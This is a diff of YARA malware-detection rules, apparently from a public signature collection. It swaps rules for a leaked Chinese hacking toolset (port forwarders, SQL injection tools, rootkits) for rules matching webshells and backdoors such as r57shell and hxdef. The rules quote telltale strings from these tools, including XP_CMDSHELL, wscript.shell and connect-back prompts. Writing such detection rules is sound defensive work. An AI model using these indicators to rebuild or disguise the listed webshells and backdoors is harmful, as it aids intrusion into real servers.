+		$s7 = "CreateRemoteThread error!"
+		$s8 = "Kernel32"
+		$s9 = "VirtualAllocEx error!"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_F4Ck_Team_F4Ck_3 : FILE
+rule SIGNATURE_BASE_Hxdef100_2
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file F4ck_3.exe"
+		description = "Webshells Auto-generated - file hxdef100.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1767669f-47d0-5d6e-97a5-92522f988102"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2229-L2248"
+		id = "1f079b73-29de-50cf-868c-1639a43e576f"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8220-L8233"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0b3e9381930f02e170e484f12233bbeb556f3731"
-		logic_hash = "870d22be85da127b3ebfd3f8ec547b6ad1cdc8048b56aea494e8d2643bd61d77"
-		score = 70
+		hash = "1b393e2e13b9c57fb501b7cd7ad96b25"
+		logic_hash = "d44131f6c1bfdc36079f474832a79a361dfad96d1b84f7004d682150c93eccc5"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "F4ck.exe" fullword wide
-		$s2 = "@Netapi32.dll" fullword ascii
-		$s3 = "Team.F4ck.Net" fullword wide
-		$s6 = "NO Net Add User" fullword wide
-		$s7 = "DLL ERROR" fullword ascii
-		$s11 = "F4ck Team" fullword wide
+		$s0 = "\\\\.\\mailslot\\hxdef-rkc000"
+		$s2 = "Shared Components\\On Access Scanner\\BehaviourBlo"
+		$s6 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_ACCESS_Brute : FILE
+rule SIGNATURE_BASE_Release_Dlltest
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ACCESS_brute.exe"
+		description = "Webshells Auto-generated - file dllTest.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7ceaea93-4f23-50a3-ab39-8149b10ffdad"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2250-L2268"
+		id = "af821252-8409-5572-9014-59e8c5feaacd"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8234-L8254"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f552e05facbeb21cb12f23c34bb1881c43e24c34"
-		logic_hash = "5bd0cbb1c2f5863ef1365dc115c736ade05c290cd6fa09a24c2d344314b522cb"
-		score = 70
+		hash = "76a59fc3242a2819307bb9d593bef2e0"
+		logic_hash = "ba759ae1bbde357085b2b2dfda0780b5a239a44b4e999244e8eceed246090ce3"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = ".dns166.co" ascii
-		$s2 = "SExecuteA" ascii
-		$s3 = "ality/clsCom" ascii
-		$s4 = "NT_SINK_AddRef" ascii
-		$s5 = "WINDOWS\\Syswm" ascii
+		$s0 = ";;;Y;`;d;h;l;p;t;x;|;"
+		$s1 = "0 0&00060K0R0X0f0l0q0w0"
+		$s2 = ": :$:(:,:0:4:8:D:`=d="
+		$s3 = "4@5P5T5\\5T7\\7d7l7t7|7"
+		$s4 = "1,121>1C1K1Q1X1^1e1k1s1y1"
+		$s5 = "9 9$9(9,9P9X9\\9`9d9h9l9p9t9x9|9"
+		$s6 = "0)0O0\\0a0o0\"1E1P1q1"
+		$s7 = "<.<I<d<h<l<p<t<x<|<"
+		$s8 = "3&31383>3F3Q3X3`3f3w3|3"
+		$s9 = "8@;D;H;L;P;T;X;\\;a;9=W=z="
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Fpipe_Fpipe : FILE
+rule SIGNATURE_BASE_Webadmin
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file FPipe.exe"
+		description = "Webshells Auto-generated - file webadmin.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0d84aa8f-dc15-5bb7-a568-224c6a837685"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2270-L2286"
+		id = "615d87f8-9094-5994-aea1-d7276623fbca"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8255-L8266"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a2c51c6fa93a3dfa14aaf31fb1c48a3a66a32d11"
-		logic_hash = "bde46f2508dc82f91e39cc7bd88960e836522b068546ce65ebc07db69b3d4493"
-		score = 50
+		hash = "3a90de401b30e5b590362ba2dde30937"
+		logic_hash = "6e215c3d8b8357b839416ee6951f7739387bb94aa1284ea7e827ae2205221294"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Unable to create TCP listen socket. %s%d" fullword ascii
-		$s2 = "http://www.foundstone.com" fullword ascii
-		$s3 = "%s %s port %d. Address is already in use" fullword ascii
+		$s0 = "<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpu"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Layer_Layer : FILE
+rule SIGNATURE_BASE_Commands
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Layer.exe"
+		description = "Webshells Auto-generated - file commands.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "48e27119-da7e-5921-8d4f-f8a1e3ac0439"
-		date = "2015-06-23"
-		modified = "2022-12-21"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2288-L2305"
+		id = "7cffefc7-4f24-5908-82a4-f11eda398377"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8267-L8279"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0f4f27e842787cb854bd61f9aca86a63f653eb41"
-		logic_hash = "03e2d875de6dc45a0cede55071c071944c4cdf4610f52fe4a21f6dd5dedac41d"
-		score = 70
+		hash = "174486fe844cb388e2ae3494ac2d1ec2"
+		logic_hash = "5251ee090934c8f99a8a2ffef2605593943306937dc56a135a47f1da7e732587"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\Release\\Layer.pdb" ascii
-		$s2 = "Layer.exe" fullword wide
-		$s3 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0" fullword wide
+		$s1 = "If CheckRecord(\"SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = \" & VictimID"
+		$s2 = "proxyArr = Array (\"HTTP_X_FORWARDED_FOR\",\"HTTP_VIA\",\"HTTP_CACHE_CONTROL\",\"HTTP_F"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Ms10048_X86 : FILE
+rule SIGNATURE_BASE_Hkdoordll
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ms10048-x86.exe"
+		description = "Webshells Auto-generated - file hkdoordll.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5d572d35-d2e5-5457-89d9-fbce8f8fa552"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2307-L2321"
+		id = "c4cfb575-89c3-5a72-8bf5-234d4284fe9d"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8280-L8291"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e57b453966e4827e2effa4e153f2923e7d058702"
-		logic_hash = "2f67b3be31b1d1eb420b40ec291db7271acd692af9f061d5db17415685cf7546"
-		score = 70
+		hash = "b715c009d47686c0e62d0981efce2552"
+		logic_hash = "a3c4d262b59cdf82390c0457810505e9e7a18c9b26ba4524bc368fd2141ec306"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "[+] Set to %d exploit half succeeded" fullword ascii
+		$s6 = "Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Htran2_4 : FILE
+rule SIGNATURE_BASE_R57Shell_2
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file HTran2.4.exe"
+		description = "Webshells Auto-generated - file r57shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "21cb5ec5-900d-5092-8c2b-2d951289957c"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2323-L2338"
+		id = "d3a3fe11-c9e1-523b-88a3-ddc0c1085d04"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8292-L8303"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "524f986692f55620013ab5a06bf942382e64d38a"
-		logic_hash = "dd1332d3dca12513b1f8a1d10148f6fa2eb7cc809ac7cf6f4dcc9090746718b5"
-		score = 70
+		hash = "8023394542cddf8aee5dec6072ed02b5"
+		logic_hash = "5319426928d33b62527efb561c2b7a226a5a473735f501b267e6b3b174972085"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii
-		$s2 = "[+] New connection %s:%d !!" fullword ascii
+		$s2 = "echo \"<br>\".ws(2).\"HDD Free : <b>\".view_size($free).\"</b> HDD Total : <b>\".view_"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 180KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Skinhrootkit_Skinh : FILE
+rule SIGNATURE_BASE_Mithril_V1_45_Dlltest
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file SkinH.exe"
+		description = "Webshells Auto-generated - file dllTest.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8aedd01c-9dc8-537d-97ea-bc8de81edd3d"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2340-L2356"
+		id = "2aea84b6-1b51-58cd-b52b-c31b1f75d295"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8304-L8317"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d593f03ae06e54b653c7850c872c0eed459b301f"
-		logic_hash = "97314a8c908c714c39ea8962c87709fdc422c3e2998a2b1694950fa127204335"
-		score = 70
+		hash = "1b9e518aaa62b15079ff6edb412b21e9"
+		logic_hash = "cf1e2ca39ae6b726792bbbaf0f1dd90788a4bb9ba5e3d50c22d75f2b3d4e9e7d"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "(C)360.cn Inc.All Rights Reserved." fullword wide
-		$s1 = "SDVersion.dll" fullword wide
-		$s2 = "skinh.dll" fullword ascii
+		$s3 = "syspath"
+		$s4 = "\\Mithril"
+		$s5 = "--list the services in the computer"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker__Postgresql_Mysql_Injectv1_1_Creak_Oracle_Sqlserver_Inject_Creaked : FILE
+rule SIGNATURE_BASE_Dbgiis6Cli
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset"
+		description = "Webshells Auto-generated - file dbgiis6cli.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0272776c-8dbe-5345-92c8-57593686a84c"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2358-L2378"
+		id = "2bc59a6b-f45c-5e68-a346-ac56e8f2757b"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8318-L8330"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ed809a5fb35d36b2a8758e470657bda1a04d80577d5129962cd7d0ab9a80cf8a"
-		score = 70
+		hash = "3044dceb632b636563f66fee3aaaf8f3"
+		logic_hash = "f6de3c9b8fbcca230540d1b41659ab02c9548df69f53fa9d5730ac7bb7dfe88a"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "1ecfaa91aae579cfccb8b7a8607176c82ec726f4"
-		hash1 = "a1f066789f48a76023598c5777752c15f91b76b0"
-		hash2 = "0264f4efdba09eaf1e681220ba96de8498ab3580"
-		hash3 = "af3c41756ec8768483a4cf59b2e639994426e2c2"
 
 	strings:
-		$s1 = "zhaoxypass@yahoo.com.cn" fullword ascii
-		$s2 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
-		$s3 = "ProxyParams.ProxyPort" fullword ascii
+		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
+		$s5 = "###command:(NO more than 100 bytes!)"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker__Wwwscan_Wwwscan_Wwwscan_Gui : FILE
+rule SIGNATURE_BASE_Remview_2003_04_22
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - from files wwwscan.exe, wwwscan.exe, wwwscan_gui.exe"
+		description = "Webshells Auto-generated - file remview_2003_04_22.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "02f80151-4dfb-5b14-9145-312a9bd2c609"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2380-L2398"
+		id = "3088ee27-42a3-5140-98de-ab6f87c7748b"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8331-L8342"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0fd6ab38dca839605c1b7cd51a4a8d3268551f0725ccee7c7521f13d6f9e7076"
-		score = 70
+		hash = "17d3e4e39fbca857344a7650f7ea55e3"
+		logic_hash = "2957f6ec7a022ac04759724276f6928625708346903597b0765b5e81207fc6b9"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "6dbffa916d0f0be2d34c8415592b9aba690634c7"
-		hash1 = "6bed45629c5e54986f2d27cbfc53464108911026"
-		hash2 = "897b66a34c58621190cb88e9b2a2a90bf9b71a53"
 
 	strings:
-		$s1 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
-		$s2 = "<Usage>:  %s <HostName|Ip> [Options]" fullword ascii
+		$s1 = "\"<b>\".mm(\"Eval PHP code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\""
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker__LPK_LPK_LPK : FILE
+rule SIGNATURE_BASE_FSO_S_Test
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - from files LPK.DAT, LPK.DAT, LPK.DAT"
+		description = "Webshells Auto-generated - file test.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e1beb88b-d3e8-5868-affb-e59c26e4dc2e"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2400-L2421"
+		id = "b0cc5a2a-c741-50dd-854f-5a43769e8f47"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8343-L8355"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0309241ed0e899519cf3edd1544a14d09fff4a8162514ae49b3a6b70eda1ed4f"
-		score = 70
+		hash = "82cf7b48da8286e644f575b039a99c26"
+		logic_hash = "62613bead716717f116290b1c9eca9aa63eadd280050811e30a54e5d186af2fc"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "5a1226e73daba516c889328f295e728f07fdf1c3"
-		hash1 = "2b2ab50753006f62965bba83460e3960ca7e1926"
-		hash2 = "cf2549bbbbdb7aaf232d9783873667e35c8d96c1"
 
 	strings:
-		$s1 = "C:\\WINDOWS\\system32\\cmd.exe" fullword wide
-		$s2 = "Password error!" fullword ascii
-		$s3 = "\\sathc.exe" ascii
-		$s4 = "\\sothc.exe" ascii
-		$s5 = "\\lpksethc.bat" ascii
+		$s0 = "$yazi = \"test\" . \"\\r\\n\";"
+		$s2 = "fwrite ($fp, \"$yazi\");"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1057KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker__Builder_Shift_Skinh : FILE
+rule SIGNATURE_BASE_Debug_Cress
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - from files builder.exe, shift.exe, SkinH.exe"
+		description = "Webshells Auto-generated - file cress.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cb18aa4a-6eba-58ca-a6fc-e4160b90f4d7"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2423-L2444"
+		id = "6cf3e43c-bec1-5688-b1d7-8ac48d59153a"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8356-L8368"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d15802df98d72b4ef3bac2dfb8ba3338c540ef7290d7ddf9738cf0f7b86e17ea"
-		score = 70
+		hash = "36a416186fe010574c9be68002a7286a"
+		logic_hash = "670e236e72d3cb52ea5dba865749baee58a70f8d100db1dd8eddfe3183339181"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "6b5a84cdc3d27c435d49de3f68872d015a5aadfc"
-		hash1 = "ee127c1ea1e3b5bf3d2f8754fabf9d1101ed0ee0"
-		hash2 = "d593f03ae06e54b653c7850c872c0eed459b301f"
 
 	strings:
-		$s1 = "lipboard" fullword ascii
-		$s2 = "uxthem" fullword ascii
-		$s3 = "ENIGMA" fullword ascii
-		$s4 = "UtilW0ndow" fullword ascii
-		$s5 = "prog3am" fullword ascii
+		$s0 = "\\Mithril "
+		$s4 = "Mithril.exe"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 6075KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker__Lcx_Htran2_4_Htran20 : FILE
+rule SIGNATURE_BASE_Webshell
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - from files lcx.exe, HTran2.4.exe, htran20.exe"
+		description = "Webshells Auto-generated - file webshell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c6851e7b-ab64-5578-896e-4d92fb3b2000"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2446-L2465"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8369-L8384"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "30184394ad3ec7bf209bb0a22da889699bac6167ecc09e693c88f8643c754394"
-		score = 70
+		hash = "f2f8c02921f29368234bfb4d4622ad19"
+		logic_hash = "e3fdce426d2f6e88d8e9412a3026ea05d027af934763eafe0188602458c2289d"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "0c8779849d53d0772bbaa1cedeca150c543ebf38"
-		hash1 = "524f986692f55620013ab5a06bf942382e64d38a"
-		hash2 = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
 
 	strings:
-		$s1 = "[SERVER]connection to %s:%d error" fullword ascii
-		$s2 = "[+] OK! I Closed The Two Socket." fullword ascii
-		$s3 = "[+] Start Transmit (%s:%d <-> %s:%d) ......" fullword ascii
+		$s0 = "RhViRYOzz"
+		$s1 = "d\\O!jWW"
+		$s2 = "bc!jWW"
+		$s3 = "0W[&{l"
+		$s4 = "[INhQ@\\"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 440KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker__D_Injection_V2_32_D_Injection_V2_32_D_Injection_V2_32 : FILE
+rule SIGNATURE_BASE_FSO_S_EFSO_2
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - from files D_injection_V2.32.exe, D_injection_V2.32.exe, D_injection_V2.32.exe"
+		description = "Webshells Auto-generated - file EFSO_2.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "79e9cd97-c070-5109-a0a0-bc88eea0dc37"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2467-L2488"
+		id = "e88d324c-1dee-5b07-b528-cf760e3ee7a6"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8385-L8397"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5c318c670b3aedf66da1c6444df7d630d2263e88527facfcf75d76dd974e7d31"
-		score = 70
+		hash = "a341270f9ebd01320a7490c12cb2e64c"
+		logic_hash = "462c713e5d4fb6d0db91b14bfacdca73f780559ba2dad80988c356ee1a3d369d"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
-		hash1 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
-		hash2 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
 
 	strings:
-		$s1 = "upfile.asp " fullword ascii
-		$s2 = "[wscript.shell]" fullword ascii
-		$s3 = "XP_CMDSHELL" fullword ascii
-		$s4 = "[XP_CMDSHELL]" fullword ascii
-		$s5 = "http://d99net.3322.org" fullword ascii
+		$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
+		$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and 4 of them
+		all of them
 }
-
-rule SIGNATURE_BASE_APT_APT10_Malware_Imphash_Dec18_1 : FILE
+rule SIGNATURE_BASE_Thelast_Index3
 {
 	meta:
-		description = "Detects APT10 malware based on ImpHashes"
+		description = "Webshells Auto-generated - file index3.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2de195a3-63a4-50ac-a83d-ab0db0f784bf"
-		date = "2018-12-28"
-		modified = "2023-12-05"
-		reference = "AlienVault OTX IOCs - statistical sample analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt10.yar#L1390-L1406"
+		id = "41310217-b9a7-5360-80c4-7d0a3969f848"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8398-L8409"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d6e2f23f3809e7a7064bfe4859db3480454a9c8b21ffac2e1e8b7b8a8906de93"
+		hash = "cceff6dc247aaa25512bad22120a14b4"
+		logic_hash = "3700141ca2cf53f49618e2d4cab8866efccdce843921f1733b3d6260b8feea68"
